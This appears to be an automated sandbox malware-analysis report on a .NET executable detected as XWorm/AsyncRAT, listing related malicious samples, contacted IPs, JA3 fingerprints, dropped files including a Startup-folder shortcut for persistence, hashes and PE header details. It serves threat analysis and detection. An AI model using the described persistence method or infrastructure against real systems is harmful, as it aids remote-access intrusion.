                                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                  • 149.154.167.99
                                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                  • 149.154.167.99
                                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                  • 149.154.167.99
                                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                  • 149.154.167.99
                                                                  MV. VISHVA EKTA - VESSEL PARTICULARS.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  ship particulars_M.V FAROUK M.pdf.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  Invoice Payment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  http://web.telagram.vip/Get hashmaliciousUnknownBrowse
                                                                  • 149.154.167.99
                                                                  SALSGIVERUSY666Gn09a1.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.21
                                                                  file.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.22
                                                                  stub.exeGet hashmaliciousAsyncRATBrowse
                                                                  • 147.185.221.22
                                                                  b34J4bxnmN.exeGet hashmaliciousNjratBrowse
                                                                  • 147.185.221.18
                                                                  01koiHnedL.exeGet hashmaliciousNjratBrowse
                                                                  • 147.185.221.18
                                                                  nPIv2AODg2.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.19
                                                                  WLO9Pkkle0.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.22
                                                                  uUY8turU3x.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 147.185.221.22
                                                                  wB5Gc9RKzG.exeGet hashmaliciousXWormBrowse
                                                                  • 147.185.221.22
                                                                  Uhj9qfwbYG.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                  • 147.185.221.21

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  3b5074b1b5d032e5620f69f9f700ff0e5kUoor36qV.ps1Get hashmaliciousUnknownBrowse
                                                                  • 149.154.167.220
                                                                  Y666Gn09a1.exeGet hashmaliciousXWormBrowse
                                                                  • 149.154.167.220
                                                                  1726581965845c2fe68a8cab55e569fc6397face189f7761140e1d40ddcdf40e0f007b43ac990.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                  • 149.154.167.220
                                                                  Solicitud De Presupuesto 09-16-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                  • 149.154.167.220
                                                                  U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                  • 149.154.167.220
                                                                  Zahteva za prora#U010dun 09-17-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                  • 149.154.167.220
                                                                  Label_PL001292992.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                  • 149.154.167.220
                                                                  AG#976832.vbsGet hashmaliciousAsyncRATBrowse
                                                                  • 149.154.167.220
                                                                  Request for budget 09-17-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                  • 149.154.167.220
                                                                  Solicitud De Presupuesto 09-16-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                  • 149.154.167.220

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):64
                                                                  Entropy (8bit):0.34726597513537405
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlll:Nll
                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  Preview:@...e...........................................................

                                                                  C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\NzEsfIiAc0.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):29
                                                                  Entropy (8bit):3.598349098128234
                                                                  Encrypted:false
                                                                  SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                                                  MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                                                  SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                                                  SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                                                  SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:....### explorer ###..[WIN]r

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_230qqwrd.kb2.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4v23cysx.1bh.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aoqitr14.zoi.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0ayzvvc.5f1.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fs0b4vao.1wb.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0abbdj1.1ey.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ihyzpctt.koq.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iiplkhgd.edu.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxi0gdwb.e4b.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvufncmt.tsw.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qp0n0a1k.ads.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qzex1y3d.hdf.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqob2szw.tnd.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t32xiivh.1gz.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tem4hgjv.mno.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wizs3ccb.mhm.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\NzEsfIiAc0.exe
                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Sep 17 14:26:31 2024, mtime=Tue Sep 17 14:26:31 2024, atime=Tue Sep 17 14:26:31 2024, length=40960, window=hide
                                                                  Category:dropped
                                                                  Size (bytes):767
                                                                  Entropy (8bit):5.018661589852222
                                                                  Encrypted:false
                                                                  SSDEEP:12:8E24Qpnu8Ch70lXIsY//Ct+8L7J7pjAL+Hkip5P7zmV:8+YDk0lXUi7JNALFgxm
                                                                  MD5:4B3DD15399D5A236C0605B9C2EB8D93E
                                                                  SHA1:F3BFC60DE5C0B8116054C1F33986F886594A7BF0
                                                                  SHA-256:A60E013DB73E12FE05FCC0484475C6B842D400B0E6BF483A8735EF9408CFD367
                                                                  SHA-512:CF6B7ABC5010354274DA5D6408E4C0FC3F5EB9F81D16109711030B675BF73F01ECFF33DABBBB592DC0A23682F9CD19741C87C7CF3F5438CA313E3331F8DD886B
                                                                  Malicious:false
                                                                  Preview:L..................F.... ...................................................v.:..DG..Yr?.D..U..k0.&...&.......$..S...Y..................t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<21Y0{...........................^.A.p.p.D.a.t.a...B.V.1.....1Y.{..Roaming.@......EW<21Y.{..../......................-}.R.o.a.m.i.n.g.....b.2.....1YP{ .XClient.exe.H......1YP{1YP{...........................-}.X.C.l.i.e.n.t...e.x.e.......\...............-.......[...........*.......C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......367706...........hT..CrF.f4... ...-.u...-...-$..hT..CrF.f4... ...-.u...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                  C:\Users\user\AppData\Roaming\XClient.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\NzEsfIiAc0.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40960
                                                                  Entropy (8bit):5.566168736562233
                                                                  Encrypted:false
                                                                  SSDEEP:768:e3sFxMCWMqmjnkRbF6Qas7j5JOFWPX9tj6cOMhKadodV:e3sFxzrIJvarF09tj6cOM8Mor
                                                                  MD5:BFDF788A451CF345E09E7646734F4666
                                                                  SHA1:0729903458944361B593EE6EF120DE0ECA8913B3
                                                                  SHA-256:0B80B6D2E6B7330C1F917DC01D612F6F314630EDC8D05F3831689865990DCBA5
                                                                  SHA-512:48DDEB385413BFC7DF293D8D1A0D634955C5E236E071C88AC97A51213195BF792BBA4F65B19FCF7E54DD9F1CAC126E9ED95C663827D3CEB8197076166169BDF5
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 82%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!..f............................>.... ........@.. ....................................@....................................S.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H.......L[...X............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):5.566168736562233
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:NzEsfIiAc0.exe
                                                                  File size:40'960 bytes
                                                                  MD5:bfdf788a451cf345e09e7646734f4666
                                                                  SHA1:0729903458944361b593ee6ef120de0eca8913b3
                                                                  SHA256:0b80b6d2e6b7330c1f917dc01d612f6f314630edc8d05f3831689865990dcba5
                                                                  SHA512:48ddeb385413bfc7df293d8d1a0d634955c5e236e071c88ac97a51213195bf792bba4f65b19fcf7e54dd9f1cac126e9ed95c663827d3ceb8197076166169bdf5
                                                                  SSDEEP:768:e3sFxMCWMqmjnkRbF6Qas7j5JOFWPX9tj6cOMhKadodV:e3sFxzrIJvarF09tj6cOM8Mor
                                                                  TLSH:60035C447BD44221D6FEBFFA59B3A2060730F607CA13D78E08C5A99A6F37B8449153D6
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!..f............................>.... ........@.. ....................................@................................

                                                                  File Icon

                                                                  Icon Hash:00928e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x40b43e
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x66B69821 [Fri Aug 9 22:28:49 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
